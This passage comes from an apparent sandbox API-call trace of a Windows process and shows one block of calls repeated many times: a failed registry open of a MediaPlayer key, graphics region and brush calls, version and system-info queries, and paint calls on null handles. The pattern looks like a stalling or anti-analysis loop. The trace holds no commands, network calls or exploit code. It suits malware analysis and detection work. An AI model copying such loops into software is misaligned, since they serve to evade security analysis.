ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.155] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x740401cd [0088.155] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x720401d0 [0088.155] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f5a [0088.155] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f5b [0088.155] CombineRgn (hrgnDst=0x1040f5a, hrgnSrc1=0x740401cd, hrgnSrc2=0x720401d0, iMode=1) returned 1 [0088.155] CombineRgn (hrgnDst=0x1040f5b, hrgnSrc1=0x740401cd, hrgnSrc2=0x720401d0, iMode=4) returned 2 [0088.155] CreateSolidBrush (color=0xff) returned 0x2100f59 [0088.155] CreateSolidBrush (color=0xff0000) returned 0x1100f5c [0088.155] DeleteObject (ho=0x1100f5c) returned 1 [0088.155] DeleteObject (ho=0x720401d0) returned 1 [0088.155] DeleteObject (ho=0x740401cd) returned 1 [0088.155] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.155] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.155] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.155] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.155] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.155] BeginPath (hdc=0x0) returned 0 [0088.155] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.155] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.155] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.155] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.155] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.155] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.156] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.156] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.156] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x730401d0 [0088.156] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x750401cd [0088.156] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f5d [0088.156] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f5e [0088.156] CombineRgn (hrgnDst=0x1040f5d, hrgnSrc1=0x730401d0, hrgnSrc2=0x750401cd, iMode=1) returned 1 [0088.156] CombineRgn (hrgnDst=0x1040f5e, hrgnSrc1=0x730401d0, hrgnSrc2=0x750401cd, iMode=4) returned 2 [0088.156] CreateSolidBrush (color=0xff) returned 0x2100f5c [0088.156] CreateSolidBrush (color=0xff0000) returned 0x1100f5f [0088.156] DeleteObject (ho=0x1100f5f) returned 1 [0088.156] DeleteObject (ho=0x750401cd) returned 1 [0088.156] DeleteObject (ho=0x730401d0) returned 1 [0088.156] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.156] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.156] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.156] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.156] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.156] BeginPath (hdc=0x0) returned 0 [0088.156] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.156] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.156] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.156] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.156] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.156] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.156] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.156] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.156] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x760401cd [0088.156] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x740401d0 [0088.156] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f60 [0088.156] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f61 [0088.156] CombineRgn (hrgnDst=0x1040f60, hrgnSrc1=0x760401cd, hrgnSrc2=0x740401d0, iMode=1) returned 1 [0088.156] CombineRgn (hrgnDst=0x1040f61, hrgnSrc1=0x760401cd, hrgnSrc2=0x740401d0, iMode=4) returned 2 [0088.156] CreateSolidBrush (color=0xff) returned 0x2100f5f [0088.156] CreateSolidBrush (color=0xff0000) returned 0x1100f62 [0088.156] DeleteObject (ho=0x1100f62) returned 1 [0088.156] DeleteObject (ho=0x740401d0) returned 1 [0088.156] DeleteObject (ho=0x760401cd) returned 1 [0088.156] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.157] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.157] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.157] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.157] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.157] BeginPath (hdc=0x0) returned 0 [0088.157] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.157] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.157] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.157] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.157] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.157] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.157] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.157] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.157] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x750401d0 [0088.157] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x770401cd [0088.157] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f63 [0088.157] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f64 [0088.157] CombineRgn (hrgnDst=0x1040f63, hrgnSrc1=0x750401d0, hrgnSrc2=0x770401cd, iMode=1) returned 1 [0088.157] CombineRgn (hrgnDst=0x1040f64, hrgnSrc1=0x750401d0, hrgnSrc2=0x770401cd, iMode=4) returned 2 [0088.157] CreateSolidBrush (color=0xff) returned 0x2100f62 [0088.157] CreateSolidBrush (color=0xff0000) returned 0x1100f65 [0088.157] DeleteObject (ho=0x1100f65) returned 1 [0088.157] DeleteObject (ho=0x770401cd) returned 1 [0088.157] DeleteObject (ho=0x750401d0) returned 1 [0088.157] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.157] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.157] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.157] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.157] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.157] BeginPath (hdc=0x0) returned 0 [0088.157] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.157] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.157] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.157] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.157] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.157] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.157] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.157] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.158] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x780401cd [0088.158] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x760401d0 [0088.158] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f66 [0088.158] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f67 [0088.158] CombineRgn (hrgnDst=0x1040f66, hrgnSrc1=0x780401cd, hrgnSrc2=0x760401d0, iMode=1) returned 1 [0088.158] CombineRgn (hrgnDst=0x1040f67, hrgnSrc1=0x780401cd, hrgnSrc2=0x760401d0, iMode=4) returned 2 [0088.158] CreateSolidBrush (color=0xff) returned 0x2100f65 [0088.158] CreateSolidBrush (color=0xff0000) returned 0x1100f68 [0088.158] DeleteObject (ho=0x1100f68) returned 1 [0088.158] DeleteObject (ho=0x760401d0) returned 1 [0088.158] DeleteObject (ho=0x780401cd) returned 1 [0088.158] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.158] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.158] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.158] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.158] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.158] BeginPath (hdc=0x0) returned 0 [0088.158] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.158] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.158] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.158] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.158] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.158] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.158] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.158] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x770401d0 [0088.158] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x790401cd [0088.158] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f69 [0088.158] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f6a [0088.158] CombineRgn (hrgnDst=0x1040f69, hrgnSrc1=0x770401d0, hrgnSrc2=0x790401cd, iMode=1) returned 1 [0088.158] CombineRgn (hrgnDst=0x1040f6a, hrgnSrc1=0x770401d0, hrgnSrc2=0x790401cd, iMode=4) returned 2 [0088.158] CreateSolidBrush (color=0xff) returned 0x2100f68 [0088.158] CreateSolidBrush (color=0xff0000) returned 0x1100f6b [0088.158] DeleteObject (ho=0x1100f6b) returned 1 [0088.158] DeleteObject (ho=0x790401cd) returned 1 [0088.158] DeleteObject (ho=0x770401d0) returned 1 [0088.158] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.158] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.159] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.159] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.159] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.159] BeginPath (hdc=0x0) returned 0 [0088.159] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.159] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.159] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.159] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.159] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.159] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.159] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.159] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a0401cd [0088.159] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x780401d0 [0088.159] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f6c [0088.159] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f6d [0088.159] CombineRgn (hrgnDst=0x1040f6c, hrgnSrc1=0x7a0401cd, hrgnSrc2=0x780401d0, iMode=1) returned 1 [0088.159] CombineRgn (hrgnDst=0x1040f6d, hrgnSrc1=0x7a0401cd, hrgnSrc2=0x780401d0, iMode=4) returned 2 [0088.159] CreateSolidBrush (color=0xff) returned 0x2100f6b [0088.159] CreateSolidBrush (color=0xff0000) returned 0x1100f6e [0088.159] DeleteObject (ho=0x1100f6e) returned 1 [0088.159] DeleteObject (ho=0x780401d0) returned 1 [0088.159] DeleteObject (ho=0x7a0401cd) returned 1 [0088.159] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.159] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.159] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.159] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.159] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.159] BeginPath (hdc=0x0) returned 0 [0088.159] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.159] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.159] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.159] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.159] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.159] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.159] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.159] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x790401d0 [0088.160] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b0401cd [0088.160] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f6f [0088.160] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f70 [0088.160] CombineRgn (hrgnDst=0x1040f6f, hrgnSrc1=0x790401d0, hrgnSrc2=0x7b0401cd, iMode=1) returned 1 [0088.160] CombineRgn (hrgnDst=0x1040f70, hrgnSrc1=0x790401d0, hrgnSrc2=0x7b0401cd, iMode=4) returned 2 [0088.160] CreateSolidBrush (color=0xff) returned 0x2100f6e [0088.160] CreateSolidBrush (color=0xff0000) returned 0x1100f71 [0088.160] DeleteObject (ho=0x1100f71) returned 1 [0088.160] DeleteObject (ho=0x7b0401cd) returned 1 [0088.160] DeleteObject (ho=0x790401d0) returned 1 [0088.160] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.160] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.160] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.160] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.160] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.160] BeginPath (hdc=0x0) returned 0 [0088.160] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.160] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.160] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.160] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.160] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.160] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.160] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.160] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c0401cd [0088.160] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a0401d0 [0088.160] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f72 [0088.160] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f73 [0088.160] CombineRgn (hrgnDst=0x1040f72, hrgnSrc1=0x7c0401cd, hrgnSrc2=0x7a0401d0, iMode=1) returned 1 [0088.160] CombineRgn (hrgnDst=0x1040f73, hrgnSrc1=0x7c0401cd, hrgnSrc2=0x7a0401d0, iMode=4) returned 2 [0088.160] CreateSolidBrush (color=0xff) returned 0x2100f71 [0088.160] CreateSolidBrush (color=0xff0000) returned 0x1100f74 [0088.160] DeleteObject (ho=0x1100f74) returned 1 [0088.160] DeleteObject (ho=0x7a0401d0) returned 1 [0088.160] DeleteObject (ho=0x7c0401cd) returned 1 [0088.160] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.160] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.160] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.160] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.160] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.160] BeginPath (hdc=0x0) returned 0 [0088.160] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.161] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.161] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.161] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.161] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.161] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.161] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.161] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b0401d0 [0088.161] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d0401cd [0088.161] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f75 [0088.161] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f76 [0088.161] CombineRgn (hrgnDst=0x1040f75, hrgnSrc1=0x7b0401d0, hrgnSrc2=0x7d0401cd, iMode=1) returned 1 [0088.161] CombineRgn (hrgnDst=0x1040f76, hrgnSrc1=0x7b0401d0, hrgnSrc2=0x7d0401cd, iMode=4) returned 2 [0088.161] CreateSolidBrush (color=0xff) returned 0x2100f74 [0088.161] CreateSolidBrush (color=0xff0000) returned 0x1100f77 [0088.161] DeleteObject (ho=0x1100f77) returned 1 [0088.161] DeleteObject (ho=0x7d0401cd) returned 1 [0088.161] DeleteObject (ho=0x7b0401d0) returned 1 [0088.161] GetVersionExA (in: 